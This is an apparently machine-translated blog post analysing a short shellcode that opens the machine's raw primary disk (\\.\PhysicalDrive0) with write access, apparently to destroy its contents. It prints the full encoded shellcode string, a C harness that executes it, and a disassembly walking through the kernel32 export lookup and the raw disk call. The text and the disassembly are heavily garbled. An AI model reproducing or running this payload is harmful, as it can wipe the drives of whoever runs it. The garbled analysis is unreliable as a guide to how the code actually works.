Shellcode analysis of a lattice disk

Shellcode Source:

Historically the smallest "trellis" without repositioning ShellCode-Dora
http://bbs.pediy.com/showthread.php?t=194664

Shellcode Source:

Char g_szfromshellcode[] = "pyiiiiiiiiiiiiiiii7qzjaxp0a0akaaq2ab2bb0" "BBABXP8ABUJIRULKZLMQJLOPWP5PUP8GW5K03SQB" " CUCQHGREOTRTPEQVAYXGPEOX0LSUV7UPLMSUOPPP "" Rpv5nkhlk3jlwxlkqu5xpsrvrwlkdhlkpps4xgpek "" Lupupgps0ni0mkhmyruc8stmqp030upuplk704llk "" 2pelnmlkcpuxlkkhnkg7elnkptuwrxgszwlkpjuhl "" KAJQ0VCYORINK4TLKWSL7LKCUZXEI5VQEKCNKAUFH "" 09pfvdpuzklkpzets3koqvlkdlbknkrzglusyolku "" Tlkgsywoycukllkquklaoqnsknkkuqmliqux48gg5 "" Nlqlwpslwphgw5np4nupqlupkwsultf0up1xepjg3 "" Umhpygpcc7po7suolayupsswpo7quopsqwpblwpo7 "" 3UOT1TS0PR30KWSUOXCYWPCFUPO7RENL3UEP4PWPK "" wcunpwpwpepepszgpczwppjs3pjepazdc1x5pc07p "" kplmcullpplkcuodkoxplkzxnmrmmhlmrunxp3o0v "" 0RPBPPPRHEPKQEWUPPQBRPPV0QCH8ARGPWPC0NM2T "" A4ZXVOUDWP "; int main (int argc, char* argv[]) {    _asm    {        lea eax , G_szfromshellcode call        eax    }        return 0;}

Shellcode have a piece of their own decryption code of the assembly, very simple do not post, look at the decryption:

. data:00406030 Pfnshellcode proc near;                   DATA XREF: _maino.data:00406030.data:00406030 szcreatefilew= byte ptr-80h.data:00406030                   szphysicaldrive0= byte ptr-74h.data:00406030 pcreatefilew= DWORD ptr-4ch.data:00406030 var_48= byte ptr-48h.data:00406030 szcrea= DWORD ptr-8.data:00406030 PROCESSOR                      _architecture= DWORD ptr-4.data:00406030 sztefi= DWORD ptr 8.data:00406030.data:00406030 55     Push ebp.data:00406031 8B EC mov ebp, esp.data:00406033 bayi EC-xx-XX Sub ESP, 80h.data:00406039 C7 65+ mov dword ptr [Ebp+szcreatefilew], ' AERC '; createfilew.data:00406040 C7 46+ mov dword ptr [ebp+szcreatefilew+4], ' Ifet '. data:00406047 C7 45 88 6 C-57+ mov dword ptr [ebp+szcreatefilew+8], ' Wel '. data:0040604e 8D             45 80   Lea EAX, [ebp+szcreatefilew].data:00406051 50 push eax.data:00406052 Push eax.data:00406053 ebp.data:00406054 8B EC mov ebp, esp.dat a:00406056, EC, sub ESP, 8.data:00406059 8B mov eax, [ebp+sztefi].data:004                      0605C ebx.data:0040605d Push esi.data:0040605e 57     Push edi.data:0040605f 8B mov ecx, [eax].data:00406061 8B mov EDX, [eax+4];. data:00406061;;                 Save String "Createfi". data:00406064 C7 FC xx 00+ mov [ebp+processor_architecture], 0.data:0040606b 4D F8  mov [Ebp+szcrea], ecx.data:0040606e, MOV [Ebp+sztefi], edx.data:00406071 64 A1 xx eax, large Fs:30h; Get _peb.data:00406077 8B 0C mov eax, [eax+0ch]; Get ldr_peb_ldr_data.data:0040607a 8B 1C mov esi, [eax+1ch];                             Get inloadordermodulelist (First-NtDll loadinfolist). data:0040607d AD LODSD ;                                                           loadinfolist++: Second-kernel32 loadinfolist.data:0040607d ;. data:0040607d; getdllinfo.data:0040607d;;. data:0040607e 8B mov eax, [eax+8];     Get kernel32_imagebase.data:00406081 8B F8 mov edi, eax.data:00406083 8B 3C mov EAX, [edi+3ch]; Get _image_dos_header.e_lfanew.data:00406086 8B for mov edx, [edi+eax+78h];             Get Export Table offset.data:0040608a D7      add edx, EDI; Export Table address.data:0040608c 8B 4 a mov ecx, [edx+18h]; Get exportdirectory->numberoffunctions.data:0040608f 8B 5A mov ebx, [edx+20h]; Get exportdirectory->addressoffunctions.data:0040608f;;. data:00406092 DF add ebx, edi.data:00406094.data:00406094 Getexportfunname_begi N:; CODE xref:pfnshellcode+6fj.data:00406094; pfnshellcode+77j.data:00406094 Dec ecx; Numberoffunctions--. data:00406095 8B 8B mov esi, [ebx+ecx*4].data:00406098 F7 a DD ESI, EDI;                   Get Kernel32 exportfunname.data:0040609a 8B F8 mov eax, [ebp+szcrea].data:0040609d 39 06   Cmp  [esi], eax.data:0040609f F3 jnz short getexportfunname_begin;                Numberoffunctions--. data:004060a1 8B mov eax, [ebp+sztefi].data:004060a4 39 46 04 CMP [esi+4], Eax.data:004060a7-EB jnz short getexportfunname_begin;. DATA:004060A7;; GETEXPORTFUNNAME_END.DATA:004060A9 8B 5A mov ebx, [edx+24h]; Get environment Variables rocessor_architecture.data:004060ac DF add ebx, Edi.data:004060ae 8B 0C 4 B m                   OV CX, [ebx+ecx*2].data:004060b2 8B 5A 1C mov ebx, [edx+1ch].data:004060b5 DF     Add ebx, edi.data:004060b7 8B 8B mov eax, [ebx+ecx*4].data:004060ba C7 add                EAX, EDI.DATA:004060BC FC mov [ebp+processor_architecture], EAX.DATA:004060BF 8B FC mov eax, [ebp+proceSSOR_ARCHITECTURE].DATA:004060C2 5F pop edi.data:004060c3 5E pop esi.dat                      A:004060c4 5B pop ebx.data:004060c5 8B E5 mov esp, ebp.data:004060c7 5D  Pop ebp.data:004060c8 B4 mov [Ebp+pcreatefilew], EAX.DATA:004060CB C7 8C 5C 5c+ mov dword ptr [EBP+SZPHYSICALDRIVE0], 5c005ch; Get "\\.\physicaldrive0\" (that is, the physical drive of this machine 0-> the primary hard drive). data:004060d2 C7 2E 5c+ mov dword ptr [EBP+SZPHYSICALDRIVE0  +4], 5c002eh.data:004060d9 C7 94 68+ mov dword ptr [ebp+szphysicaldrive0+8], 680050h.data:004060e0 C7 45 98 73+ mov dword ptr [ebp+szphysicaldrive0+0ch], 730079h.data:004060e7 C7 9C, 63+ mov dwo RD PTR [ebp+szphysicaldrive0+10h], 630069h.data:004060ee C7 A0, 6c+ mov dword ptr [ebp+szphysicaldrive0+1 4h], 6c0061h.data:004060f5 C7 A4 72+ mov dword ptr [EBP+SZPHYSICALDRIVE0+18H], 720044H.DATA:004060FC C7 A8, 76+ mov dword ptr [ebp+szphysicaldrive0+1ch], 760069h.dat      a:00406103 C7 AC 00 +/------------------00 C7 (B0) mov dword ptr [ebp+szphysicaldrive0+24h], 0;. data:0040610a 00; Createfilew (SZPHYSICALDRIVE0, generic_read| Generic_write, File_share_read | File_share_write, NULL, open_existing, NULL, NULL);. data:00406111 6A, push 0; Push null.data:00406113 6A, push 0; Push null.data:00406115 6A-Push 3; Push open_existing.data:00406117 6A, push 0; Push null.data:00406119 6A-Push 3; Push File_share_read | FILE_SHARE_WRITE.DATA:0040611B-C0 Pu, XXSH 0c0000000h; Push generic_read| generic_write.data:00406120 8D                       8C Lea EAX, [ebp+szphysicaldrive0].data:00406123 push EAX ;                   Push szphysicaldrive0.data:00406124 8B B4 mov eax, [ebp+pcreatefilew].data:00406127 FF D0 call eax; Call createfilew.data:00406129 8B D8 mov ebx, eax; Save hfile.data:00406129;;. data:0040612b 8D 4D B8 Lea ECX, [ebp+var_48].data:0040612e 8D                      B8 Lea edx, [ebp+var_48].data:00406131 C0 xor eax, eax.data:00406133 50 push eax; Push null.data:00406134 push eax; Push null.data:00406135 push eax; Push null.data:00406136 push eax;                       Push null.data:00406137 C1 7c100h.data:0040613c push ECX ; Push punkonw.data:0040613d-Push edx; Push punkonw.data:0040613e push eax; Push null.data:0040613f push eax; Push null.data:00406140 ebx; Push hfile.data:00406141 B8 (mov eax, 42h.data:00406146 8D F8 Lea edx, [esp+54h+szphysicaldrive0+18h]; Lea (& (DWORD) szphysicaldrive0-4). data:0040614a 0F Sysenter

Shellcode Analysis of a segment of the grid